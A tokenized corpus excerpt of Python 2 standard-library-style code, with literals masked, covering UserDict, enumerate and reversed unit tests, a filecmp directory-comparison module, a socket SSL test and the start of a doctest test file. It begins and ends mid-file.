assertEqual ( t , u2 ) <EOL> class Items : <EOL> def items ( self ) : <EOL> return ( ( "<STR_LIT:x>" , <NUM_LIT> ) , ( "<STR_LIT:y>" , <NUM_LIT> ) ) <EOL> t = UserDict . UserDict ( ) <EOL> t . update ( Items ( ) ) <EOL> self . assertEqual ( t , { "<STR_LIT:x>" : <NUM_LIT> , "<STR_LIT:y>" : <NUM_LIT> } ) <EOL> for i in u2 . keys ( ) : <EOL> self . assertEqual ( u2 . get ( i ) , u2 [ i ] ) <EOL> self . assertEqual ( u1 . get ( i ) , d1 . get ( i ) ) <EOL> self . assertEqual ( u0 . get ( i ) , d0 . get ( i ) ) <EOL> for i in xrange ( <NUM_LIT:20> ) : <EOL> u2 [ i ] = str ( i ) <EOL> ikeys = [ ] <EOL> for k in u2 : <EOL> ikeys . append ( k ) <EOL> keys = u2 . keys ( ) <EOL> self . assertEqual ( set ( ikeys ) , set ( keys ) ) <EOL> t = UserDict . UserDict ( ) <EOL> self . assertEqual ( t . setdefault ( "<STR_LIT:x>" , <NUM_LIT> ) , <NUM_LIT> ) <EOL> self . assert_ ( t . has_key ( "<STR_LIT:x>" ) ) <EOL> self . assertEqual ( t . setdefault ( "<STR_LIT:x>" , <NUM_LIT> ) , <NUM_LIT> ) <EOL> t = UserDict . UserDict ( x = <NUM_LIT> ) <EOL> self . assertEqual ( t . pop ( "<STR_LIT:x>" ) , <NUM_LIT> ) <EOL> self . assertRaises ( KeyError , t . pop , "<STR_LIT:x>" ) <EOL> self . assertEqual ( t . pop ( "<STR_LIT:x>" , <NUM_LIT:1> ) , <NUM_LIT:1> ) <EOL> t [ "<STR_LIT:x>" ] = <NUM_LIT> <EOL> self . assertEqual ( t . pop ( "<STR_LIT:x>" , <NUM_LIT:1> ) , <NUM_LIT> ) <EOL> t = UserDict . UserDict ( x = <NUM_LIT> ) <EOL> self . assertEqual ( t . popitem ( ) , ( "<STR_LIT:x>" , <NUM_LIT> ) ) <EOL> self . assertRaises ( KeyError , t . popitem ) <EOL> def test_missing ( self ) : <EOL> self . assertEqual ( hasattr ( UserDict , "<STR_LIT>" ) , False ) <EOL> class D ( UserDict . UserDict ) : <EOL> def __missing__ ( self , key ) : <EOL> return <NUM_LIT> <EOL> d = D ( { <NUM_LIT:1> : <NUM_LIT:2> , <NUM_LIT:3> : <NUM_LIT:4> } ) <EOL> self . assertEqual ( d [ <NUM_LIT:1> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( d [ <NUM_LIT:3> ] , <NUM_LIT:4> ) <EOL> self . 
assert_ ( <NUM_LIT:2> not in d ) <EOL> self . assert_ ( <NUM_LIT:2> not in d . keys ( ) ) <EOL> self . assertEqual ( d [ <NUM_LIT:2> ] , <NUM_LIT> ) <EOL> class E ( UserDict . UserDict ) : <EOL> def __missing__ ( self , key ) : <EOL> raise RuntimeError ( key ) <EOL> e = E ( ) <EOL> try : <EOL> e [ <NUM_LIT> ] <EOL> except RuntimeError , err : <EOL> self . assertEqual ( err . args , ( <NUM_LIT> , ) ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> class F ( UserDict . UserDict ) : <EOL> def __init__ ( self ) : <EOL> self . __missing__ = lambda key : None <EOL> UserDict . UserDict . __init__ ( self ) <EOL> f = F ( ) <EOL> try : <EOL> f [ <NUM_LIT> ] <EOL> except KeyError , err : <EOL> self . assertEqual ( err . args , ( <NUM_LIT> , ) ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> class G ( UserDict . UserDict ) : <EOL> pass <EOL> g = G ( ) <EOL> try : <EOL> g [ <NUM_LIT> ] <EOL> except KeyError , err : <EOL> self . assertEqual ( err . args , ( <NUM_LIT> , ) ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> class SeqDict ( UserDict . DictMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , other = None , ** kwargs ) : <EOL> self . keylist = [ ] <EOL> self . valuelist = [ ] <EOL> if other is not None : <EOL> for ( key , value ) in other : <EOL> self [ key ] = value <EOL> for ( key , value ) in kwargs . iteritems ( ) : <EOL> self [ key ] = value <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> i = self . keylist . index ( key ) <EOL> except ValueError : <EOL> raise KeyError <EOL> return self . valuelist [ i ] <EOL> def __setitem__ ( self , key , value ) : <EOL> try : <EOL> i = self . keylist . index ( key ) <EOL> self . valuelist [ i ] = value <EOL> except ValueError : <EOL> self . keylist . append ( key ) <EOL> self . valuelist . append ( value ) <EOL> def __delitem__ ( self , key ) : <EOL> try : <EOL> i = self . keylist . index ( key ) <EOL> except ValueError : <EOL> raise KeyError <EOL> self . keylist . pop ( i ) <EOL> self . 
valuelist . pop ( i ) <EOL> def keys ( self ) : <EOL> return list ( self . keylist ) <EOL> def copy ( self ) : <EOL> d = self . __class__ ( ) <EOL> for key , value in self . iteritems ( ) : <EOL> d [ key ] = value <EOL> return d <EOL> @ classmethod <EOL> def fromkeys ( cls , keys , value = None ) : <EOL> d = cls ( ) <EOL> for key in keys : <EOL> d [ key ] = value <EOL> return d <EOL> class UserDictMixinTest ( mapping_tests . TestMappingProtocol ) : <EOL> type2test = SeqDict <EOL> def test_all ( self ) : <EOL> s = SeqDict ( ) <EOL> s [ <NUM_LIT:10> ] = '<STR_LIT>' <EOL> s [ <NUM_LIT:20> ] = '<STR_LIT>' <EOL> s [ <NUM_LIT:30> ] = '<STR_LIT>' <EOL> del s [ <NUM_LIT:20> ] <EOL> self . assertEqual ( s [ <NUM_LIT:10> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( s . keys ( ) , [ <NUM_LIT:10> , <NUM_LIT:30> ] ) <EOL> self . assert_ ( s . has_key ( <NUM_LIT:10> ) ) <EOL> self . assert_ ( not s . has_key ( <NUM_LIT:20> ) ) <EOL> self . assert_ ( <NUM_LIT:10> in s ) <EOL> self . assert_ ( <NUM_LIT:20> not in s ) <EOL> self . assertEqual ( [ k for k in s ] , [ <NUM_LIT:10> , <NUM_LIT:30> ] ) <EOL> self . assertEqual ( len ( s ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( list ( s . iteritems ( ) ) , [ ( <NUM_LIT:10> , '<STR_LIT>' ) , ( <NUM_LIT:30> , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( list ( s . iterkeys ( ) ) , [ <NUM_LIT:10> , <NUM_LIT:30> ] ) <EOL> self . assertEqual ( list ( s . itervalues ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( s . values ( ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( s . items ( ) , [ ( <NUM_LIT:10> , '<STR_LIT>' ) , ( <NUM_LIT:30> , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( s . get ( <NUM_LIT:10> ) , '<STR_LIT>' ) <EOL> self . assertEqual ( s . get ( <NUM_LIT:15> , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( s . get ( <NUM_LIT:15> ) , None ) <EOL> self . assertEqual ( s . setdefault ( <NUM_LIT> , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( s . 
setdefault ( <NUM_LIT:10> , '<STR_LIT:null>' ) , '<STR_LIT>' ) <EOL> del s [ <NUM_LIT> ] <EOL> self . assertEqual ( s . pop ( <NUM_LIT:10> ) , '<STR_LIT>' ) <EOL> self . assert_ ( <NUM_LIT:10> not in s ) <EOL> s [ <NUM_LIT:10> ] = '<STR_LIT>' <EOL> self . assertEqual ( s . pop ( "<STR_LIT:x>" , <NUM_LIT:1> ) , <NUM_LIT:1> ) <EOL> s [ "<STR_LIT:x>" ] = <NUM_LIT> <EOL> self . assertEqual ( s . pop ( "<STR_LIT:x>" , <NUM_LIT:1> ) , <NUM_LIT> ) <EOL> k , v = s . popitem ( ) <EOL> self . assert_ ( k not in s ) <EOL> s [ k ] = v <EOL> s . clear ( ) <EOL> self . assertEqual ( len ( s ) , <NUM_LIT:0> ) <EOL> self . assertRaises ( KeyError , s . popitem ) <EOL> s . update ( { <NUM_LIT:10> : '<STR_LIT>' , <NUM_LIT:20> : '<STR_LIT>' } ) <EOL> self . assertEqual ( s [ <NUM_LIT:10> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( s [ <NUM_LIT:20> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( s , { <NUM_LIT:10> : '<STR_LIT>' , <NUM_LIT:20> : '<STR_LIT>' } ) <EOL> t = SeqDict ( ) <EOL> t [ <NUM_LIT:20> ] = '<STR_LIT>' <EOL> t [ <NUM_LIT:10> ] = '<STR_LIT>' <EOL> self . assertEqual ( s , t ) <EOL> def test_main ( ) : <EOL> test_support . run_unittest ( <EOL> UserDictTest , <EOL> UserDictMixinTest <EOL> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import stat <EOL> import warnings <EOL> from itertools import ifilter , ifilterfalse , imap , izip <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _cache = { } <EOL> BUFSIZE = <NUM_LIT:8> * <NUM_LIT> <EOL> def cmp ( f1 , f2 , shallow = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> s1 = _sig ( os . stat ( f1 ) ) <EOL> s2 = _sig ( os . stat ( f2 ) ) <EOL> if s1 [ <NUM_LIT:0> ] != stat . S_IFREG or s2 [ <NUM_LIT:0> ] != stat . S_IFREG : <EOL> return False <EOL> if shallow and s1 == s2 : <EOL> return True <EOL> if s1 [ <NUM_LIT:1> ] != s2 [ <NUM_LIT:1> ] : <EOL> return False <EOL> result = _cache . get ( ( f1 , f2 ) ) <EOL> if result and ( s1 , s2 ) == result [ : <NUM_LIT:2> ] : <EOL> return result [ <NUM_LIT:2> ] <EOL> outcome = _do_cmp ( f1 , f2 ) <EOL> _cache [ f1 , f2 ] = s1 , s2 , outcome <EOL> return outcome <EOL> def _sig ( st ) : <EOL> return ( stat . S_IFMT ( st . st_mode ) , <EOL> st . st_size , <EOL> st . st_mtime ) <EOL> def _do_cmp ( f1 , f2 ) : <EOL> bufsize = BUFSIZE <EOL> fp1 , fp2 = None , None <EOL> try : <EOL> fp1 = open ( f1 , '<STR_LIT:rb>' ) <EOL> fp2 = open ( f2 , '<STR_LIT:rb>' ) <EOL> while True : <EOL> b1 = fp1 . read ( bufsize ) <EOL> b2 = fp2 . read ( bufsize ) <EOL> if b1 != b2 : <EOL> return False <EOL> if not b1 : <EOL> return True <EOL> finally : <EOL> if fp1 : <EOL> fp1 . close ( ) <EOL> if fp2 : <EOL> fp2 . close ( ) <EOL> class dircmp : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , a , b , ignore = None , hide = None ) : <EOL> self . left = a <EOL> self . right = b <EOL> if hide is None : <EOL> self . hide = [ os . curdir , os . pardir ] <EOL> else : <EOL> self . hide = hide <EOL> if ignore is None : <EOL> self . ignore = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> self . ignore = ignore <EOL> def phase0 ( self ) : <EOL> self . left_list = _filter ( os . listdir ( self . left ) , <EOL> self . hide + self . ignore ) <EOL> self . right_list = _filter ( os . 
listdir ( self . right ) , <EOL> self . hide + self . ignore ) <EOL> self . left_list . sort ( ) <EOL> self . right_list . sort ( ) <EOL> def phase1 ( self ) : <EOL> a = dict ( izip ( imap ( os . path . normcase , self . left_list ) , self . left_list ) ) <EOL> b = dict ( izip ( imap ( os . path . normcase , self . right_list ) , self . right_list ) ) <EOL> self . common = map ( a . __getitem__ , ifilter ( b . has_key , a ) ) <EOL> self . left_only = map ( a . __getitem__ , ifilterfalse ( b . has_key , a ) ) <EOL> self . right_only = map ( b . __getitem__ , ifilterfalse ( a . has_key , b ) ) <EOL> def phase2 ( self ) : <EOL> self . common_dirs = [ ] <EOL> self . common_files = [ ] <EOL> self . common_funny = [ ] <EOL> for x in self . common : <EOL> a_path = os . path . join ( self . left , x ) <EOL> b_path = os . path . join ( self . right , x ) <EOL> ok = <NUM_LIT:1> <EOL> try : <EOL> a_stat = os . stat ( a_path ) <EOL> except os . error , why : <EOL> ok = <NUM_LIT:0> <EOL> try : <EOL> b_stat = os . stat ( b_path ) <EOL> except os . error , why : <EOL> ok = <NUM_LIT:0> <EOL> if ok : <EOL> a_type = stat . S_IFMT ( a_stat . st_mode ) <EOL> b_type = stat . S_IFMT ( b_stat . st_mode ) <EOL> if a_type != b_type : <EOL> self . common_funny . append ( x ) <EOL> elif stat . S_ISDIR ( a_type ) : <EOL> self . common_dirs . append ( x ) <EOL> elif stat . S_ISREG ( a_type ) : <EOL> self . common_files . append ( x ) <EOL> else : <EOL> self . common_funny . append ( x ) <EOL> else : <EOL> self . common_funny . append ( x ) <EOL> def phase3 ( self ) : <EOL> xx = cmpfiles ( self . left , self . right , self . common_files ) <EOL> self . same_files , self . diff_files , self . funny_files = xx <EOL> def phase4 ( self ) : <EOL> self . subdirs = { } <EOL> for x in self . common_dirs : <EOL> a_x = os . path . join ( self . left , x ) <EOL> b_x = os . path . join ( self . right , x ) <EOL> self . subdirs [ x ] = dircmp ( a_x , b_x , self . ignore , self . 
hide ) <EOL> def phase4_closure ( self ) : <EOL> self . phase4 ( ) <EOL> for sd in self . subdirs . itervalues ( ) : <EOL> sd . phase4_closure ( ) <EOL> def report ( self ) : <EOL> print '<STR_LIT>' , self . left , self . right <EOL> if self . left_only : <EOL> self . left_only . sort ( ) <EOL> print '<STR_LIT>' , self . left , '<STR_LIT::>' , self . left_only <EOL> if self . right_only : <EOL> self . right_only . sort ( ) <EOL> print '<STR_LIT>' , self . right , '<STR_LIT::>' , self . right_only <EOL> if self . same_files : <EOL> self . same_files . sort ( ) <EOL> print '<STR_LIT>' , self . same_files <EOL> if self . diff_files : <EOL> self . diff_files . sort ( ) <EOL> print '<STR_LIT>' , self . diff_files <EOL> if self . funny_files : <EOL> self . funny_files . sort ( ) <EOL> print '<STR_LIT>' , self . funny_files <EOL> if self . common_dirs : <EOL> self . common_dirs . sort ( ) <EOL> print '<STR_LIT>' , self . common_dirs <EOL> if self . common_funny : <EOL> self . common_funny . sort ( ) <EOL> print '<STR_LIT>' , self . common_funny <EOL> def report_partial_closure ( self ) : <EOL> self . report ( ) <EOL> for sd in self . subdirs . itervalues ( ) : <EOL> print <EOL> sd . report ( ) <EOL> def report_full_closure ( self ) : <EOL> self . report ( ) <EOL> for sd in self . subdirs . itervalues ( ) : <EOL> print <EOL> sd . report_full_closure ( ) <EOL> methodmap = dict ( subdirs = phase4 , <EOL> same_files = phase3 , diff_files = phase3 , funny_files = phase3 , <EOL> common_dirs = phase2 , common_files = phase2 , common_funny = phase2 , <EOL> common = phase1 , left_only = phase1 , right_only = phase1 , <EOL> left_list = phase0 , right_list = phase0 ) <EOL> def __getattr__ ( self , attr ) : <EOL> if attr not in self . methodmap : <EOL> raise AttributeError , attr <EOL> self . 
methodmap [ attr ] ( self ) <EOL> return getattr ( self , attr ) <EOL> def cmpfiles ( a , b , common , shallow = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> res = ( [ ] , [ ] , [ ] ) <EOL> for x in common : <EOL> ax = os . path . join ( a , x ) <EOL> bx = os . path . join ( b , x ) <EOL> res [ _cmp ( ax , bx , shallow ) ] . append ( x ) <EOL> return res <EOL> def _cmp ( a , b , sh , abs = abs , cmp = cmp ) : <EOL> try : <EOL> return not abs ( cmp ( a , b , sh ) ) <EOL> except os . error : <EOL> return <NUM_LIT:2> <EOL> def _filter ( flist , skip ) : <EOL> return list ( ifilterfalse ( skip . __contains__ , flist ) ) <EOL> def demo ( ) : <EOL> import sys <EOL> import getopt <EOL> options , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , '<STR_LIT:r>' ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> raise getopt . GetoptError ( '<STR_LIT>' , None ) <EOL> dd = dircmp ( args [ <NUM_LIT:0> ] , args [ <NUM_LIT:1> ] ) <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in options : <EOL> dd . report_full_closure ( ) <EOL> else : <EOL> dd . report ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> demo ( ) </s>
<s> import unittest <EOL> import sys <EOL> from test import test_support <EOL> class G : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> def __getitem__ ( self , i ) : <EOL> return self . seqn [ i ] <EOL> class I : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> if self . i >= len ( self . seqn ) : raise StopIteration <EOL> v = self . seqn [ self . i ] <EOL> self . i += <NUM_LIT:1> <EOL> return v <EOL> class Ig : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> for val in self . seqn : <EOL> yield val <EOL> class X : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def next ( self ) : <EOL> if self . i >= len ( self . seqn ) : raise StopIteration <EOL> v = self . seqn [ self . i ] <EOL> self . i += <NUM_LIT:1> <EOL> return v <EOL> class E : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> <NUM_LIT:3> // <NUM_LIT:0> <EOL> class N : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> return self <EOL> class EnumerateTestCase ( unittest . TestCase ) : <EOL> enum = enumerate <EOL> seq , res = '<STR_LIT:abc>' , [ ( <NUM_LIT:0> , '<STR_LIT:a>' ) , ( <NUM_LIT:1> , '<STR_LIT:b>' ) , ( <NUM_LIT:2> , '<STR_LIT:c>' ) ] <EOL> def test_basicfunction ( self ) : <EOL> self . assertEqual ( type ( self . enum ( self . seq ) ) , self . enum ) <EOL> e = self . enum ( self . seq ) <EOL> self . assertEqual ( iter ( e ) , e ) <EOL> self . assertEqual ( list ( self . enum ( self . seq ) ) , self . res ) <EOL> self . enum . 
__doc__ <EOL> def test_getitemseqn ( self ) : <EOL> self . assertEqual ( list ( self . enum ( G ( self . seq ) ) ) , self . res ) <EOL> e = self . enum ( G ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( StopIteration , e . next ) <EOL> def test_iteratorseqn ( self ) : <EOL> self . assertEqual ( list ( self . enum ( I ( self . seq ) ) ) , self . res ) <EOL> e = self . enum ( I ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( StopIteration , e . next ) <EOL> def test_iteratorgenerator ( self ) : <EOL> self . assertEqual ( list ( self . enum ( Ig ( self . seq ) ) ) , self . res ) <EOL> e = self . enum ( Ig ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( StopIteration , e . next ) <EOL> def test_noniterable ( self ) : <EOL> self . assertRaises ( TypeError , self . enum , X ( self . seq ) ) <EOL> def test_illformediterable ( self ) : <EOL> self . assertRaises ( TypeError , list , self . enum ( N ( self . seq ) ) ) <EOL> def test_exception_propagation ( self ) : <EOL> self . assertRaises ( ZeroDivisionError , list , self . enum ( E ( self . seq ) ) ) <EOL> def test_argumentcheck ( self ) : <EOL> self . assertRaises ( TypeError , self . enum ) <EOL> self . assertRaises ( TypeError , self . enum , <NUM_LIT:1> ) <EOL> self . assertRaises ( TypeError , self . enum , '<STR_LIT:abc>' , <NUM_LIT:2> ) <EOL> @ test_support . impl_detail ( ) <EOL> def test_tuple_reuse ( self ) : <EOL> self . assertEqual ( len ( set ( map ( id , list ( enumerate ( self . seq ) ) ) ) ) , len ( self . seq ) ) <EOL> self . assertEqual ( len ( set ( map ( id , enumerate ( self . seq ) ) ) ) , min ( <NUM_LIT:1> , len ( self . 
seq ) ) ) <EOL> class MyEnum ( enumerate ) : <EOL> pass <EOL> class SubclassTestCase ( EnumerateTestCase ) : <EOL> enum = MyEnum <EOL> class TestEmpty ( EnumerateTestCase ) : <EOL> seq , res = '<STR_LIT>' , [ ] <EOL> class TestBig ( EnumerateTestCase ) : <EOL> seq = range ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:2> ) <EOL> res = zip ( range ( <NUM_LIT> ) , seq ) <EOL> class TestReversed ( unittest . TestCase ) : <EOL> def test_simple ( self ) : <EOL> class A : <EOL> def __getitem__ ( self , i ) : <EOL> if i < <NUM_LIT:5> : <EOL> return str ( i ) <EOL> raise StopIteration <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> for data in '<STR_LIT:abc>' , range ( <NUM_LIT:5> ) , tuple ( enumerate ( '<STR_LIT:abc>' ) ) , A ( ) , xrange ( <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:5> ) : <EOL> self . assertEqual ( list ( data ) [ : : - <NUM_LIT:1> ] , list ( reversed ( data ) ) ) <EOL> self . assertRaises ( TypeError , reversed , { } ) <EOL> @ test_support . impl_detail ( ) <EOL> def test_xrange_optimization ( self ) : <EOL> x = xrange ( <NUM_LIT:1> ) <EOL> self . assertEqual ( type ( reversed ( x ) ) , type ( iter ( x ) ) ) <EOL> @ test_support . impl_detail ( ) <EOL> def test_len ( self ) : <EOL> from test . test_iterlen import len <EOL> for s in ( '<STR_LIT:hello>' , tuple ( '<STR_LIT:hello>' ) , list ( '<STR_LIT:hello>' ) , xrange ( <NUM_LIT:5> ) ) : <EOL> self . assertEqual ( len ( reversed ( s ) ) , len ( s ) ) <EOL> r = reversed ( s ) <EOL> list ( r ) <EOL> self . assertEqual ( len ( r ) , <NUM_LIT:0> ) <EOL> class SeqWithWeirdLen : <EOL> called = False <EOL> def __len__ ( self ) : <EOL> if not self . called : <EOL> self . called = True <EOL> return <NUM_LIT:10> <EOL> raise ZeroDivisionError <EOL> def __getitem__ ( self , index ) : <EOL> return index <EOL> r = reversed ( SeqWithWeirdLen ( ) ) <EOL> self . 
assertRaises ( ZeroDivisionError , len , r ) <EOL> def test_gc ( self ) : <EOL> class Seq : <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:10> <EOL> def __getitem__ ( self , index ) : <EOL> return index <EOL> s = Seq ( ) <EOL> r = reversed ( s ) <EOL> s . r = r <EOL> def test_args ( self ) : <EOL> self . assertRaises ( TypeError , reversed ) <EOL> self . assertRaises ( TypeError , reversed , [ ] , '<STR_LIT>' ) <EOL> def test_bug1229429 ( self ) : <EOL> if not hasattr ( sys , "<STR_LIT>" ) : <EOL> return <EOL> def f ( ) : <EOL> pass <EOL> r = f . __reversed__ = object ( ) <EOL> rc = sys . getrefcount ( r ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> try : <EOL> reversed ( f ) <EOL> except TypeError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> self . assertEqual ( rc , sys . getrefcount ( r ) ) <EOL> def test_main ( verbose = None ) : <EOL> testclasses = ( EnumerateTestCase , SubclassTestCase , TestEmpty , TestBig , <EOL> TestReversed ) <EOL> test_support . run_unittest ( * testclasses ) <EOL> import sys <EOL> if verbose and hasattr ( sys , "<STR_LIT>" ) : <EOL> counts = [ None ] * <NUM_LIT:5> <EOL> for i in xrange ( len ( counts ) ) : <EOL> test_support . run_unittest ( * testclasses ) <EOL> counts [ i ] = sys . gettotalrefcount ( ) <EOL> print counts <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( verbose = True ) </s>
<s> import sys <EOL> from test import test_support <EOL> import socket <EOL> import errno <EOL> skip_expected = not ( test_support . is_resource_enabled ( '<STR_LIT>' ) and <EOL> hasattr ( socket , "<STR_LIT>" ) ) <EOL> def test_basic ( ) : <EOL> test_support . requires ( '<STR_LIT>' ) <EOL> import urllib <EOL> if test_support . verbose : <EOL> print "<STR_LIT>" <EOL> socket . RAND_status ( ) <EOL> try : <EOL> socket . RAND_egd ( <NUM_LIT:1> ) <EOL> except TypeError : <EOL> pass <EOL> else : <EOL> print "<STR_LIT>" <EOL> socket . RAND_add ( "<STR_LIT>" , <NUM_LIT> ) <EOL> try : <EOL> f = urllib . urlopen ( '<STR_LIT>' ) <EOL> except IOError , exc : <EOL> if exc . errno == errno . ETIMEDOUT : <EOL> raise test_support . ResourceDenied ( '<STR_LIT>' ) <EOL> else : <EOL> raise <EOL> buf = f . read ( ) <EOL> f . close ( ) <EOL> def test_timeout ( ) : <EOL> test_support . requires ( '<STR_LIT>' ) <EOL> def error_msg ( extra_msg ) : <EOL> print >> sys . stderr , """<STR_LIT>""" % ( ADDR , extra_msg ) <EOL> if test_support . verbose : <EOL> print "<STR_LIT>" <EOL> ADDR = "<STR_LIT>" , <NUM_LIT> <EOL> s = socket . socket ( ) <EOL> s . settimeout ( <NUM_LIT> ) <EOL> try : <EOL> s . connect ( ADDR ) <EOL> except socket . timeout : <EOL> error_msg ( '<STR_LIT>' ) <EOL> return <EOL> except socket . error , exc : <EOL> if exc . args [ <NUM_LIT:0> ] == errno . ECONNREFUSED : <EOL> error_msg ( '<STR_LIT>' ) <EOL> return <EOL> else : <EOL> raise <EOL> ss = socket . ssl ( s ) <EOL> ss . read ( <NUM_LIT:1> ) <EOL> ss . read ( <NUM_LIT:1> ) <EOL> s . close ( ) <EOL> def test_rude_shutdown ( ) : <EOL> if test_support . verbose : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import threading <EOL> except ImportError : <EOL> return <EOL> PORT = [ <NUM_LIT> ] <EOL> listener_ready = threading . Event ( ) <EOL> listener_gone = threading . Event ( ) <EOL> def listener ( ) : <EOL> s = socket . socket ( ) <EOL> PORT [ <NUM_LIT:0> ] = test_support . 
bind_port ( s , '<STR_LIT>' , PORT [ <NUM_LIT:0> ] ) <EOL> s . listen ( <NUM_LIT:5> ) <EOL> listener_ready . set ( ) <EOL> s1 , addr = s . accept ( ) <EOL> s1 . close ( ) <EOL> listener_gone . set ( ) <EOL> def connector ( ) : <EOL> listener_ready . wait ( ) <EOL> s = socket . socket ( ) <EOL> s . connect ( ( '<STR_LIT:localhost>' , PORT [ <NUM_LIT:0> ] ) ) <EOL> listener_gone . wait ( ) <EOL> try : <EOL> ssl_sock = socket . ssl ( s ) <EOL> except socket . sslerror , e : <EOL> pass <EOL> else : <EOL> raise test_support . TestFailed ( <EOL> '<STR_LIT>' ) <EOL> t = threading . Thread ( target = listener ) <EOL> t . start ( ) <EOL> connector ( ) <EOL> t . join ( ) <EOL> def test_main ( ) : <EOL> if not hasattr ( socket , "<STR_LIT>" ) : <EOL> raise test_support . TestSkipped ( "<STR_LIT>" ) <EOL> test_rude_shutdown ( ) <EOL> test_basic ( ) <EOL> test_timeout ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> from py . builtin import reversed <EOL> from py . test import raises <EOL> def test_reversed ( ) : <EOL> r = reversed ( "<STR_LIT:hello>" ) <EOL> assert iter ( r ) is r <EOL> assert r . next ( ) == "<STR_LIT:o>" <EOL> assert r . next ( ) == "<STR_LIT:l>" <EOL> assert r . next ( ) == "<STR_LIT:l>" <EOL> assert r . next ( ) == "<STR_LIT:e>" <EOL> assert r . next ( ) == "<STR_LIT:h>" <EOL> raises ( StopIteration , r . next ) <EOL> assert list ( reversed ( list ( reversed ( "<STR_LIT:hello>" ) ) ) ) == [ '<STR_LIT:h>' , '<STR_LIT:e>' , '<STR_LIT:l>' , '<STR_LIT:l>' , '<STR_LIT:o>' ] <EOL> raises ( TypeError , reversed , reversed ( "<STR_LIT:hello>" ) ) </s>
<s> """<STR_LIT>""" <EOL> from test import test_support <EOL> import warnings <EOL> import py <EOL> doctest = py . compat . doctest <EOL> import sys <EOL> sys . modules [ '<STR_LIT>' ] = py . compat . doctest <EOL> def sample_func ( v ) : <EOL> """<STR_LIT>""" <EOL> return v + v <EOL> class SampleClass : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , val ) : <EOL> """<STR_LIT>""" <EOL> self . val = val <EOL> def double ( self ) : <EOL> """<STR_LIT>""" <EOL> return SampleClass ( self . val + self . val ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . val <EOL> def a_staticmethod ( v ) : <EOL> """<STR_LIT>""" <EOL> return v + <NUM_LIT:1> <EOL> a_staticmethod = staticmethod ( a_staticmethod ) <EOL> def a_classmethod ( cls , v ) : <EOL> """<STR_LIT>""" <EOL> return v + <NUM_LIT:2> <EOL> a_classmethod = classmethod ( a_classmethod ) <EOL> a_property = property ( get , doc = """<STR_LIT>""" ) <EOL> class NestedClass : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , val = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> self . val = val <EOL> def square ( self ) : <EOL> return SampleClass . NestedClass ( self . val * self . val ) <EOL> def get ( self ) : <EOL> return self . val <EOL> class SampleNewStyleClass ( object ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , val ) : <EOL> """<STR_LIT>""" <EOL> self . val = val <EOL> def double ( self ) : <EOL> """<STR_LIT>""" <EOL> return SampleNewStyleClass ( self . val + self . val ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . val <EOL> class _FakeInput : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , lines ) : <EOL> self . lines = lines <EOL> def readline ( self ) : <EOL> line = self . lines . 
